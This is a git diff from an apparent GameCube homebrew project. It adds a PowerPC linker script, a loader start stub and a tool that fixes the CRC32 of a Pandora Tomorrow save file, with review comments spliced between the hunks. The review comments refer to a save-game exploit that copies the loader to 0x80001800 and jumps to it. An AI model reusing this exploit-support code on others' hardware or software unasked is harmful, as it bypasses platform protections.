+/* Copyright 2008-2009 Segher Boessenkool
+ GameCube Port Copyright 2016 FIX94
+ This code is licensed to you under the terms of the GNU GPL, version 2;
+ see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+ . = 0x80001800;
+
+ .start : { start.o(*) }
+ .text : { *(.text) }
+ .rodata : { *(.rodata .rodata.*)}
+ .data : { *(.data) }
+
+ __bss_start = .;
+ .bss : { *(.bss) }
+ __bss_end = .;
+
+ . = ALIGN(0x40);
+ .stack : {
+ . += 0x800;
+ _stack_top = .;
+ }
+}
diff --git a/loader/start.S b/loader/start.S
new file mode 100644
index 0000000..4e009ef
--- /dev/null
+++ b/loader/start.S
@@ -0,0 +1,24 @@
+// Copyright 2008-2009 Segher Boessenkool
+// GameCube Port Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+.extern _memset
+.extern _main
+.globl _start
+_start:
+
+ # Disable interrupts, enable FP.
+ mfmsr 3 ; rlwinm 3,3,0,17,15 ; ori 3,3,0x2000 ; mtmsr 3 ; isync
+
+ # Setup stack.
+ lis 1,_stack_top@ha ; addi 1,1,_stack_top@l ; li 0,0 ; stwu 0,-64(1)
+
+ # Clear BSS.
+ lis 3,__bss_start@ha ; addi 3,3,__bss_start@l
+ li 4,0
+ lis 5,__bss_end@ha ; addi 5,5,__bss_end@l ; sub 5,5,3
+ bl _memset
+
+ # Go!
+ b _main
\ No newline at end of file
diff --git a/pandoratomorrow_crc/build.bat b/pandoratomorrow_crc/build.bat
new file mode 100644
index 0000000..0c8aea3
--- /dev/null
+++ b/pandoratomorrow_crc/build.bat
@@ -0,0 +1,2 @@
+gcc -Wall -O3 -s -static crc32.c main.c -o pandoratomorrow_crc.exe
+pause
\ No newline at end of file
diff --git a/pandoratomorrow_crc/crc32.c b/pandoratomorrow_crc/crc32.c
new file mode 100644
index 0000000..5546a5e
--- /dev/null
+++ b/pandoratomorrow_crc/crc32.c
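Review bot: `. = 0x80001800;` is the third place this load address is hard-coded — `exploit/pandoratomorrow.c` copies the loader there with `_memcpy((void*)0x80001800, loader, loader_size)` and jumps to it with `lis 3, 0x8000 ; ori 3, 3, 0x1800` — and nothing in the script ties the three together. A comment on that line, `/* load address; must match the _memcpy destination and jump target in exploit/pandoratomorrow.c */`, records the coupling, and since the exploit also uses `0x80001800` as its 0x200-byte card read buffer before the copy, an `ASSERT` on the total image size after `.stack` would document how much room the loader may take. The `.stack` region sits directly above `__bss_end` and `_stack_top` grows down toward it; 0x800 bytes is plenty for this code, but a word on why that size was chosen would help the next reader.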
@@ -0,0 +1,112 @@ + +/* Copyright (C) 1986 Gary S. Brown. You may use this program, or + code or tables extracted from it, as desired without restriction.*/ + +/* First, the polynomial itself and its table of feedback terms. The */ +/* polynomial is */ +/* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0 */ +/* Note that we take it "backwards" and put the highest-order term in */ +/* the lowest-order bit. The X^32 term is "implied"; the LSB is the */ +/* X^31 term, etc. The X^0 term (usually shown as "+1") results in */ +/* the MSB being 1. */ + +/* Note that the usual hardware shift register implementation, which */ +/* is what we're using (we're merely optimizing it by doing eight-bit */ +/* chunks at a time) shifts bits into the lowest-order term. In our */ +/* implementation, that means shifting towards the right. Why do we */ +/* do it this way? Because the calculated CRC must be transmitted in */ +/* order from highest-order term to lowest-order term. UARTs transmit */ +/* characters in order from LSB to MSB. By storing the CRC this way, */ +/* we hand it to the UART in the order low-byte to high-byte; the UART */ +/* sends each low-bit to hight-bit; and the result is transmission bit */ +/* by bit from highest- to lowest-order term without requiring any bit */ +/* shuffling on our part. Reception works similarly. */ + +/* The feedback terms table consists of 256, 32-bit entries. Notes: */ +/* */ +/* 1. The table can be generated at runtime if desired; code to do so */ +/* is shown later. It might not be obvious, but the feedback */ +/* terms simply represent the results of eight shift/xor opera- */ +/* tions for all combinations of data and CRC register values. */ +/* */ +/* 2. The CRC accumulation logic is the same for all CRC polynomials, */ +/* be they sixteen or thirty-two bits wide. You simply choose the */ +/* appropriate table. 
Alternatively, because the table can be */ +/* generated at runtime, you can start by generating the table for */ +/* the polynomial in question and use exactly the same "updcrc", */ +/* if your application needn't simultaneously handle two CRC */ +/* polynomials. (Note, however, that XMODEM is strange.) */ +/* */ +/* 3. For 16-bit CRCs, the table entries need be only 16 bits wide; */ +/* of course, 32-bit entries work OK if the high 16 bits are zero. */ +/* */ +/* 4. The values must be right-shifted by eight bits by the "updcrc" */ +/* logic; the shift must be unsigned (bring in zeroes). On some */ +/* hardware you could probably optimize the shift in assembler by */ +/* using byte-swap instructions. */ + +#include +#include "crc32.h" + +#define FILEBUFFER 0x200000 /* 2MB */ + +static unsigned int crc_32_tab[] = { /* CRC polynomial 0xedb88320 */ + 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, + 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, + 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, + 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, + 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, + 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, + 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, + 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, + 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, + 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, + 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, + 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, + 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, + 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, + 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, + 0x8bbeb8ea, 0xfcb9887c, 
0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, + 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, + 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, + 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, + 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, + 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, + 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, + 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, + 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, + 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, + 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, + 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, + 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, + 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, + 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, + 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, + 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, + 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, + 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, + 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, + 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, + 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, + 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, + 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, + 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, + 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, + 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, + 0xb40bbe37, 0xc30c8ea1, 
0x5a05df1b, 0x2d02ef8d
+};
+
+unsigned int crc32buffer(const unsigned char *buffer, const unsigned int len, unsigned int oldcrc32)
+{
+ unsigned int i;
+ for(i = 0; i < len; i++)
+ oldcrc32 = UPDC32(buffer[i], oldcrc32);
+ return oldcrc32;
+}
+
+unsigned int crc32simple(void *buf, unsigned int size)
+{
+ unsigned int oldcrc32 = 0xFFFFFFFF;
+ oldcrc32 = crc32buffer(buf, size, oldcrc32);
+ return oldcrc32 = ~oldcrc32;
+}
diff --git a/pandoratomorrow_crc/crc32.h b/pandoratomorrow_crc/crc32.h
new file mode 100644
index 0000000..e412739
--- /dev/null
+++ b/pandoratomorrow_crc/crc32.h
@@ -0,0 +1,10 @@
+
+#ifndef CRC32_H
+#define CRC32_H
+
+#define UPDC32(octet, crc) (crc_32_tab[((crc)\
+ ^ (octet)) & 0xff] ^ ((crc) >> 8))
+
+unsigned int crc32simple(void *buf, unsigned int size);
+
+#endif /* CRC32_H */
diff --git a/pandoratomorrow_crc/main.c b/pandoratomorrow_crc/main.c
new file mode 100644
index 0000000..94c39fb
--- /dev/null
+++ b/pandoratomorrow_crc/main.c
@@ -0,0 +1,35 @@
+// Copyright 2018 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+#include
+#include
+#include "crc32.h"
+
+int main(int argc, char *argv[])
+{
+ if(argc != 2) return 0;
+ FILE *f = fopen(argv[1],"rb");
+ fseek(f,0,SEEK_END);
+ size_t fsize = ftell(f);
+ if(fsize != 0xA040)
+ {
+ puts("No pandora tomorrow gci!");
+ fclose(f);
+ return 0;
+ }
+ rewind(f);
+ unsigned char *buf = malloc(fsize);
+ fread(buf,fsize,1,f);
+ fclose(f);
+
+ unsigned int crc = crc32simple(buf+0x40,0x9FFC);
+ crc = __builtin_bswap32(crc);
+ memcpy(buf+0xA03C, &crc, 4);
+
+ f = fopen(argv[1],"wb");
+ fwrite(buf,0xA040,1,f);
+ fclose(f);
+ free(buf);
+ return 0;
+}
\ No newline at end of file
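Review bot: `main` returns 0 on every failure, so when `$(FIXCRC) $@` in `exploit/Makefile` hands it a file that is not 0xA040 bytes, or `fopen(argv[1],"rb")` fails, make still reports success and ships a `.gci` whose checksum was never written; use `return 1;` on those paths, and test `f` for NULL before `fseek(f,0,SEEK_END)`, which currently dereferences a null `FILE*` for a missing path. `__builtin_bswap32(crc)` followed by `memcpy(buf+0xA03C, &crc, 4)` only produces the big-endian value the console expects when the host is little-endian and the compiler is GCC/Clang; writing the bytes out explicitly is portable: `buf[0xA03C] = crc >> 24; buf[0xA03D] = crc >> 16; buf[0xA03E] = crc >> 8; buf[0xA03F] = crc;`. The `malloc` and `fread` results are also unchecked, so a short read would checksum uninitialised heap and still write the file back.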